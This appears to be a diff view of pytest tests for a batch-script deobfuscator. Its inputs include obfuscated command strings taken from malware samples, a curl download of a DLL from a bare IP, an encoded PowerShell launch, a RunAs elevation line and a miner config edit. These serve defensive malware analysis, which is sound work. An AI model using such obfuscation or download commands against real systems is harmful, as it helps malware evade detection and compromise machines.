def test_args_with_var():
377+
deobfuscator = BatchDeobfuscator()
378+
379+
cmd = "set A=123"
380+
deobfuscator.interpret_command(cmd)
381+
382+
cmd = "echo %3c%3%A%"
383+
res = deobfuscator.normalize_command(cmd)
384+
assert res == "echo c123"
385+
386+
cmd = "echo %0%A%"
387+
res = deobfuscator.normalize_command(cmd)
388+
assert res == "echo script.bat123"
389+
390+
@staticmethod
391+
def test_single_quote_var_name_rewrite_2():
392+
# Taken from 8d20c8a8104f29e7ec2ff158103fa73d3e9d357b646e2ff0487b880ab6462643
393+
deobfuscator = BatchDeobfuscator()
394+
395+
cmd = "%os:~-4,1%%comspec:~-1,1%%comspec:~14,1%%commonprogramfiles:~-6,1%'=^^^1^^^\\^^^)%comspec:~-13,1%u^^^,^^^%pathext:~31,1%b^^^8%commonprogramfiles:~9,1%^^^^^^^/v^^^&^^^U%os:~-9,1%^^^%pathext:~6,1%k%programfiles:~-12,1%p^^^[^^^*^^^@^^^~%programfiles:~-8,1%^^^%pathext:~11,1%q%comspec:~-14,1%^^^%commonprogramfiles:~24,1%^^^R^^^%pathext:~12,1%^^^0f^^^I^^^%comspec:~-9,1%^^^{^^^$%comspec:~-7,1%^^^K%programfiles:~-2,1%^^^7^^^9z%commonprogramfiles:~-11,1%^^^G^^^%os:~9,1%^^^L^^^=^^^(%commonprogramfiles:~-16,1%^^^%commonprogramfiles:~-12,1%h%comspec:~-15,1%^^^6^^^%commonprogramfiles:~10,1%^^^\"^^^Q^^^_^^^%pathext:~2,1%j^^^`%commonprogramfiles:~6,1%^^^Y^^^]^^^+^^^%pathext:~18,1%^^^-^^^%pathext:~26,1%^^^|^^^%comspec:~17,1%^^^%pathext:~7,1%^^^<%commonprogramfiles:~22,1%^^^%pathext:~17,1%^^^;^^^%os:~-10,1%^^^%os:~8,1%^^^%pathext:~41,1%^^^>^^^}^^^#^^^'%os:~-7,1%^^^.^^^5%os:~5,1%^^^4^^^:^^^%programfiles:~3,1%^^^%pathext:~47,1%%comspec:~25,1%^^^?^^^Z" # noqa: E501
396+
cmd2 = deobfuscator.normalize_command(cmd)
397+
deobfuscator.interpret_command(cmd2)
398+
399+
cmd = "%':~-124,1%%':~43,1%%':~-96,1%%':~6,1%%':~89,1%%':~-20,1%%':~-82,1%%':~17,1%%':~-69,1%%':~134,1%%':~122,1%%':~7,1%%':~-79,1%%':~-138,1%%':~36,1%%':~-117,1%%':~-96,1%%':~-154,1%%':~-71,1%%':~-67,1%%':~54,1%%':~-67,1%%':~-121,1%%':~154,1%%':~78,1%%':~130,1%%':~-132,1%%':~-138,1%%':~-124,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~12,1%%':~47,1%%':~42,1%%':~-96,1%%':~28,1%%':~78,1%%':~15,1%%':~24,1%%':~-132,1%%':~39,1%%':~47,1%%':~22,1%%':~-124,1%%':~25,1%%':~52,1%%':~-71,1%!'!%':~89,1%%':~122,1%%':~64,1%%':~-118,1%%':~89,1%%':~-143,1%%':~-69,1%%':~89,1%%':~80,1%%':~-124,1%%':~-96,1%%':~-99,1%%':~84,1%%':~70,1%%':~143,1%%':~-26,1%%0 %':~-138,1%%':~36,1%%':~43,1%%':~-96,1%%':~-154,1%%':~-71,1%%':~103,1%%':~20,1%%':~-130,1%%':~-36,1%%':~78,1%%':~45,1%%':~-149,1%%':~-106,1%%':~22,1%%':~36,1%%':~-117,1%%':~84,1%%':~-153,1%%':~6,1%%':~141,1%%':~-90,1%%':~-14,1%%':~122,1%%':~-71,1%%':~19,1%%':~43,1%%':~89,1%%':~-141,1%%':~-108,1%%':~-71,1%%':~19,1%%':~-154,1%%':~89,1%%':~51,1%%':~22,1%%':~36,1%%':~-96,1%%':~-5,1%%':~-135,1%%':~6,1%%':~5,1%%':~-71,1%%':~-96,1%%':~81,1%%':~-117,1%%':~64,1%%':~-71,1%%':~80,1%%':~36,1%%':~-99,1%%':~-79,1%%':~-117,1%%':~-155,1%%':~22,1%%':~36,1%%':~-96,1%%':~-38,1%%':~-19,1%%':~-79,1%%':~70,1%%':~-99,1%%':~39,1%%':~81,1%%':~-138,1%%':~36,1%%':~-117,1%%':~64,1%%':~-154,1%%':~89,1%%':~-113,1%%':~42,1%%':~98,1%%':~-82,1%%':~12,1%%':~24,1%%':~15,1%%':~-149,1%%':~22,1%%':~36,1%%':~43,1%%':~-96,1%%':~-154,1%%':~89,1%%':~-20,1%%':~-82,1%%':~-79,1%%':~17,1%%':~17,1%%':~17,1%%':~-28,1%%':~61,1%%':~-143,1%%':~17,1%%':~17,1%%':~-94,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~-63,1%%':~17,1%%':~-143,1%%':~17,1%%':~87,1%%':~-14,1%%':~17,1%%':~17,1%%':~17,1%%':~124,1%%':~141,1%%':~-143,1%%':~17,1%%':~-143,1%%':~138,1%%':~17,1%%':~17,1%%':~17,1%%':~36,1%%':~-143,1%%':~17,1%%':~17,1%%':~-100,1%%':~-143,1%%':~17,1%%':~17,1%%':~-136,1%%':~17,1%%':~17,1%%':~17,1%%':~-34,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~95,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~-88,1%%':~-143,1%%':~-143,1%%':~17,1%%':~148,1%%':~17,1%%':~17,1%%':~17,1%%':~113,1%%':~17,1%%':~17,1%%':~-143,1%%':~111,1%%':~17,1%%':~17,1%%':~-143,1%%':~-60,1%%':~12,1%%':~17,1%%':~-143,1%%':~-143,1%%':~-17,1%%':~17,1%%':~17,1%%':~17,1%%':~5,1%%':~28,1%%':~-143,1%%':~-143,1%%':~17,1%%':~80,1%%':~17,1%%':~-143,1%%':~17,1%%':~91,1%%':~-130,1%%':~-143,1%%':~17,1%%':~17,1%%':~157,1%%':~70,1%%':~17,1%%':~-143,1%%':~17,1%%':~-138,1%%':~39,1%%':~-143,1%%':~-143,1%%':~17,1%%':~-84,1%%':~17,1%%':~-143,1%%':~-143,1%%':~121,1%%':~-153,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~109,1%%':~-143,1%%':~-143,1%%':~17,1%%':~58,1%%':~-143,1%%':~17,1%%':~17,1%%':~-41,1%%':~-143,1%%':~17,1%%':~17,1%%':~-15,1%%':~-143,1%%':~17,1%%':~17,1%%':~-104,1%%':~17,1%%':~17,1%%':~17,1%%':~17,1%%':~17,1%%':~17,1%%':~-143,1%%':~-57,1%%':~52,1%%':~-145,1%%':~-143,1%%':~17,1%%':~-143,1%%':~128,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~115,1%%':~17,1%%':~-143,1%%':~-143,1%%':~38,1%%':~98,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~-119,1%%':~-143,1%%':~-143,1%%':~17,1%%':~74,1%%':~17,1%%':~17,1%%':~-143,1%%':~-67,1%%':~42,1%%':~-143,1%%':~17,1%%':~17,1%%':~-8,1%%':~17,1%%':~-143,1%%':~-143,1%%':~51,1%%':~85,1%%':~-135,1%%':~-143,1%%':~17,1%%':~17,1%%':~105,1%%':~-91,1%%':~17,1%%':~17,1%%':~17,1%%':~-128,1%%':~-140,1%%':~-143,1%%':~17,1%%':~17,1%%':~-106,1%%':~-117,1%%':~17,1%%':~-143,1%%':~17,1%%':~159,1%%':~17,1%%':~-143,1%%':~-143,1%%':~49,1%%':~17,1%%':~-143,1%%':~-143,1%%':~-133,1%%':~-143,1%%':~-143,1%%':~-143,1%%':~3,1%%':~-143,1%%':~17,1%%':~17,1%%':~68,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-141,1%%':~-154,1%%':~17,1%%':~-143,1%%':~-143,1%%':~154,1%%':~-143,1%%':~-143,1%%':~17,1%%':~-71,1%%':~17,1%%':~-143,1%%':~17,1%%':~107,1%%':~-96,1%%':~101,1%%':~-76,1%%':~-143,1%%':~17,1%%':~17,1%%':~-20,1%%':~-131,1%%':~17,1%%':~17,1%%':~-143,1%%':~78,1%%':~155,1%%':~17,1%%':~-143,1%%':~17,1%%':~-26,1%%':~-143,1%%':~17,1%%':~-143,1%%':~63,1%%':~17,1%%':~-143,1%%':~-143,1%%':~-151,1%%':~17,1%%':~17,1%%':~17,1%%':~83,1%%':~-143,1%%':~17,1%%':~17,1%%':~-113,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-10,1%%':~17,1%%':~17,1%%':~17,1%%':~-24,1%%':~17,1%%':~17,1%%':~17,1%%':~11,1%%':~122,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-159,1%%':~-143,1%%':~17,1%%':~-143,1%%':~-146,1%%':~-143,1%%':~17,1%%':~17,1%%':~-43,1%%':~17,1%%':~-143,1%%':~17,1%%':~130,1%%':~17,1%%':~17,1%%':~-143,1%%':~-115,1%%':~-143,1%%':~17,1%%':~17,1%%':~34,1%%':~22,1%%':~-124,1%%':~43,1%%':~-96,1%%':~-154,1%%':~89,1%%':~-145,1%%':~98,1%%':~-82,1%%':~-5,1%%':~42,1%%':~-138,1%%':~36,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~-8,1%%':~97,1%%':~47,1%%':~132,1%%':~27,1%%':~78,1%%':~83,1%%':~-140,1%%':~39,1%%':~-32,1%%':~-118,1%%':~22,1%%':~-124,1%%':~-117,1%%':~64,1%%':~-154,1%%':~-79,1%%':~70,1%%':~61,1%%':~39,1%%':~-79,1%%':~89,1%%':~-96,1%%':~-38,1%%':~-121,1%%':~-148,1%%':~81,1%%':~64,1%%':~141,1%%':~64,1%%':~81,1%%':~-121,1%%':~85,1%%':~64,1%%':~141,1%%':~64,1%%':~-5,1%%':~30,1%%':~-121,1%%':~122,1%%':~43,1%%':~-135,1%%':~-90,1%%':~-38,1%%':~22,1%%':~-96,1%%':~-38,1%%':~-19,1%%':~-79,1%%':~-99,1%%':~-90,1%%':~-121,1%%':~-79,1%%':~89,1%%':~56,1%%':~134,1%%':~-38,1%%':~7,1%%':~81,1%%':~-138,1%%':~-138,1%%':~36,1%%':~64,1%%':~61,1%%':~84,1%%':~-90,1%%':~143,1%%':~134,1%%0 %':~-138,1%%':~-138,1%%':~36,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~-130,1%%':~-30,1%%':~-76,1%%':~69,1%%':~-82,1%%':~-136,1%%':~85,1%%':~-138,1%%':~36,1%%':~43,1%%':~64,1%%':~-154,1%%':~89,1%%':~-36,1%%':~39,1%%':~27,1%%':~70,1%%':~78,1%%':~119,1%%':~61,1%%':~20,1%%':~-138,1%%':~-124,1%%':~-117,1%%':~64,1%%':~-154,1%%':~-71,1%%':~85,1%%':~-91,1%%':~72,1%%':~78,1%%':~119,1%%':~63,1%%':~-5,1%%':~22,1%%':~36,1%%':~-117,1%%':~-76,1%%':~-153,1%%':~-154,1%%':~-19,1%%':~70,1%%':~-14,1%%':~-38,1%%':~89,1%%':~-141,1%%':~43,1%%':~-71,1%%':~-141,1%%':~52,1%%':~89,1%%':~19,1%%':~-154,1%%':~89,1%%':~51,1%%':~-138,1%%':~22,1%%':~36,1%%':~-117,1%%':~64,1%%':~6,1%%':~89,1%%':~7,1%%':~119,1%%':~-88,1%%':~-106,1%%':~72,1%%':~-82,1%%':~-77,1%%':~-153,1%%':~-138,1%%':~-124,1%%':~64,1%%':~-5,1%%':~-135,1%%':~-154,1%%':~22,1%%':~22,1%%':~-124,1%%':~64,1%%':~-99,1%%':~84,1%%':~70,1%%':~-71,1%%':~-69,1%" # noqa: E501
400+
cmd2 = deobfuscator.normalize_command(cmd)
401+
for cmd3 in deobfuscator.get_commands(cmd2):
402+
cmd4 = deobfuscator.normalize_command(cmd3)
403+
deobfuscator.interpret_command(cmd4)
404+
405+
assert deobfuscator.variables["'"].endswith("^N^F^*")
406+
407+
@staticmethod
408+
def test_special_char_var_name():
409+
cmd = '@set "ò=BbQw2 1zUta9gCFolxZSYMRJ8jE6ITy7V@md3K0XDkvWr5PN4uecHqpLnOisAfGh"'
410+
deobfuscator = BatchDeobfuscator()
411+
cmd2 = deobfuscator.normalize_command(cmd)
412+
deobfuscator.interpret_command(cmd2)
413+
414+
cmd = "%ò:~33,1%%ò:~50,1%%ò:~51,1%%ò:~63,1%%ò:~15,1%%ò:~5,1%%ò:~15,1%%ò:~61,1%%ò:~61,1%"
415+
cmd2 = deobfuscator.normalize_command(cmd)
416+
assert cmd2 == "@echo off"
417+
418+
@staticmethod
419+
def test_rem_skip():
420+
deobfuscator = BatchDeobfuscator()
421+
422+
cmd = "set EXP=value"
423+
cmd2 = deobfuscator.normalize_command(cmd)
424+
deobfuscator.interpret_command(cmd2)
425+
426+
cmd = "echo *%EXP%*"
427+
cmd2 = deobfuscator.normalize_command(cmd)
428+
deobfuscator.interpret_command(cmd2)
429+
430+
assert cmd2 == "echo *value*"
431+
432+
cmd = "REM echo *%EXP%*"
433+
cmd2 = deobfuscator.normalize_command(cmd)
434+
deobfuscator.interpret_command(cmd2)
435+
436+
assert cmd2 == cmd
437+
438+
@staticmethod
439+
def test_fun_var_replace():
440+
deobfuscator = BatchDeobfuscator()
441+
442+
cmd = "%comspec%"
443+
cmd2 = deobfuscator.normalize_command(cmd)
444+
assert cmd2 == "C:\\WINDOWS\\system32\\cmd.exe"
445+
446+
cmd = "%comspec:cmd=powershell%"
447+
cmd2 = deobfuscator.normalize_command(cmd)
448+
assert cmd2 == "C:\\WINDOWS\\system32\\powershell.exe"
449+
450+
@staticmethod
451+
@pytest.mark.skip()
452+
def test_bobbystacksmash():
453+
# TODO: Improve deobfuscation
454+
# Some examples taken from https://github.com/bobbystacksmash/CMD-DeObfuscator
455+
deobfuscator = BatchDeobfuscator()
456+
457+
# Empty string removal
458+
# https://github.com/bobbystacksmash/CMD-DeObfuscator#empty-string-removal
459+
cmd = 'pow""ersh""ell'
460+
cmd2 = deobfuscator.normalize_command(cmd)
461+
assert cmd2 == "powershell"
462+
463+
# String widening
464+
# https://github.com/bobbystacksmash/CMD-DeObfuscator#string-widening
465+
cmd = 'w"s"c"r"i"p"t'
466+
cmd2 = deobfuscator.normalize_command(cmd)
467+
assert cmd2 == "wscript"
468+
469+
# Path resolver
470+
# https://github.com/bobbystacksmash/CMD-DeObfuscator#path-resolver-coming-soon
471+
cmd = "C:\\foo\\bar\\baz\\..\\..\\..\\Windows\\System32\\cmd.exe"
472+
cmd2 = deobfuscator.normalize_command(cmd)
473+
assert cmd2 == "C:\\Windows\\System32\\cmd.exe"
474+
475+
@staticmethod
476+
def test_for():
477+
deobfuscator = BatchDeobfuscator()
478+
cmd = "for /l %%x in (1, 1, 10) do echo %%x"
479+
cmd2 = list(deobfuscator.get_commands(cmd))
480+
assert len(cmd2) == 3
481+
assert cmd2 == ["for /l %%x in (1, 1, 10) do (", "echo %%x", ")"]
482+
483+
@staticmethod
484+
@pytest.mark.parametrize(
485+
"cmd, download_trait",
486+
[
487+
(
488+
"curl.exe -LO https://www.7-zip.org/a/7z1805-x64.exe",
489+
{"src": "https://www.7-zip.org/a/7z1805-x64.exe", "dst": "7z1805-x64.exe"},
490+
),
491+
(
492+
"curl.exe -o C:\\ProgramData\\output\\output.file 1.1.1.1/file.dat",
493+
{"src": "1.1.1.1/file.dat", "dst": "C:\\ProgramData\\output\\output.file"},
494+
),
495+
(
496+
'curl ""http://1.1.1.1/zazaz/p~~/Y98g~~/"" -o 9jXqQZQh.dll',
497+
{"src": "http://1.1.1.1/zazaz/p~~/Y98g~~/", "dst": "9jXqQZQh.dll"},
498+
),
499+
],
500+
)
501+
def test_interpret_curl(cmd, download_trait):
502+
deobfuscator = BatchDeobfuscator()
503+
deobfuscator.interpret_curl(cmd)
504+
assert len(deobfuscator.traits["download"]) == 1
505+
assert deobfuscator.traits["download"][-1][1] == download_trait
506+
507+
@staticmethod
508+
def test_double_double_quote_stripping():
509+
deobfuscator = BatchDeobfuscator()
510+
cmd = deobfuscator.normalize_command('cmd /C "pow""ershell -e ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="')
511+
assert cmd == 'cmd /C "powershell -e ZQBjAGgAbwAgACIAVwBpAHoAYQByAGQAIgA="'
512+
513+
@staticmethod
514+
@pytest.mark.parametrize(
515+
"cmd, exec_cmd",
516+
[
517+
('start /b cmd /c "echo Hi"', ["echo Hi"]),
518+
('start /b /i cmd /c "echo Hi"', ["echo Hi"]),
519+
('start /w cmd /c "echo Hi"', ["echo Hi"]),
520+
('start/B /WAIT cmd /c "echo Hi"', ["echo Hi"]),
521+
('start/WAIT /B cmd /c "echo Hi"', ["echo Hi"]),
522+
],
523+
)
524+
def test_interpret_start(cmd, exec_cmd):
525+
deobfuscator = BatchDeobfuscator()
526+
deobfuscator.interpret_command(cmd)
527+
assert len(deobfuscator.exec_cmd) == len(exec_cmd)
528+
for d_e_cmd, e_cmd in zip(deobfuscator.exec_cmd, exec_cmd):
529+
assert d_e_cmd == e_cmd
530+
531+
@staticmethod
532+
def test_posix_powershell():
533+
deobfuscator = BatchDeobfuscator()
534+
cmd = (
535+
"powershell -Command \"$out = cat '%USERPROFILE%\\jin\\config.json' | "
536+
"%%{$_ -replace '\\\"donate-level\\\": *\\d*,', '\\\"donate-level\\\": 1,'} | "
537+
"Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\jin\\config.json'\" "
538+
)
539+
deobfuscator.interpret_command(cmd)
540+
assert len(deobfuscator.exec_ps1) == 1
541+
assert deobfuscator.exec_ps1[0] == (
542+
b"$out = cat '%USERPROFILE%\\jin\\config.json' | "
543+
b"%%{$_ -replace '\"donate-level\": *\\d*,', '\"donate-level\": 1,'} | "
544+
b"Out-String; $out | Out-File -Encoding ASCII '%USERPROFILE%\\jin\\config.json'"
545+
)
546+
deobfuscator.exec_ps1.clear()
547+
548+
cmd = (
549+
'powershell -noprofile -command "&{start-process powershell -ArgumentList'
550+
' \'-noprofile -file \\"%scriptPath%\\"\' -verb RunAs}"'
551+
)
552+
deobfuscator.interpret_command(cmd)
553+
assert len(deobfuscator.exec_ps1) == 1
554+
assert (
555+
deobfuscator.exec_ps1[0]
556+
== b"&{start-process powershell -ArgumentList '-noprofile -file \"%scriptPath%\"' -verb RunAs}"
557+
)
558+
559+
@staticmethod
560+
@pytest.mark.skip()
561+
def test_non_posix_powershell():
562+
deobfuscator = BatchDeobfuscator()
563+
564+
# TODO: Find out how to parse this as non-posix with shlex without breaking all other cases
565+
# What to do with odd number of quotes. Shlex doesn't parse it perfectly.
566+
cmd = (
567+
'powershell -Command "Get-AppxPackage -Name "Microsoft.OneDriveSync" > '
568+
'"%WORKINGDIRONEDRIVE%\\OneDriveSparsePackage.txt" 2>&1'
569+
)
570+
deobfuscator.interpret_command(cmd)
571+
assert len(deobfuscator.exec_ps1) == 1
572+
# assert deobfuscator.exec_ps1[0] == "Good command (with or without redirection)"
573+
deobfuscator.exec_ps1.clear()
574+
575+
# TODO: Found out how to keep the \ from this command and keep posix style commands working
576+
cmd = r"PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\x64\ISO\x64.ps1"
577+
deobfuscator.interpret_command(cmd)
578+
assert len(deobfuscator.exec_ps1) == 1
579+
assert deobfuscator.exec_ps1[0] == rb"C:\ProgramData\x64\ISO\x64.ps1"
580+
581+
@staticmethod
582+
def test_anti_recursivity():
583+
deobfuscator = BatchDeobfuscator()
584+
cmd = 'set "str=a"'
585+
deobfuscator.interpret_command(cmd)
586+
587+
cmd = 'set "str=!str:"=\\"!"'
588+
cmd2 = deobfuscator.normalize_command(cmd)
589+
deobfuscator.interpret_command(cmd2)
590+
591+
cmd = "echo %str%"
592+
cmd2 = deobfuscator.normalize_command(cmd)
593+
594+
assert cmd2 == "echo a"
595+
596+
@staticmethod
597+
def test_anti_recursivity_with_quotes():
598+
deobfuscator = BatchDeobfuscator()
599+
cmd = 'set "str=a"a"'
600+
deobfuscator.interpret_command(cmd)
601+
602+
cmd = 'set "str=!str:"=\\"!"'
603+
cmd2 = deobfuscator.normalize_command(cmd)
604+
deobfuscator.interpret_command(cmd2)
605+
606+
cmd = "echo %str%"
607+
cmd2 = deobfuscator.normalize_command(cmd)
608+
609+
assert cmd2 == 'echo a\\"a'

0 commit comments

Comments
 (0)
Please sign in to comment.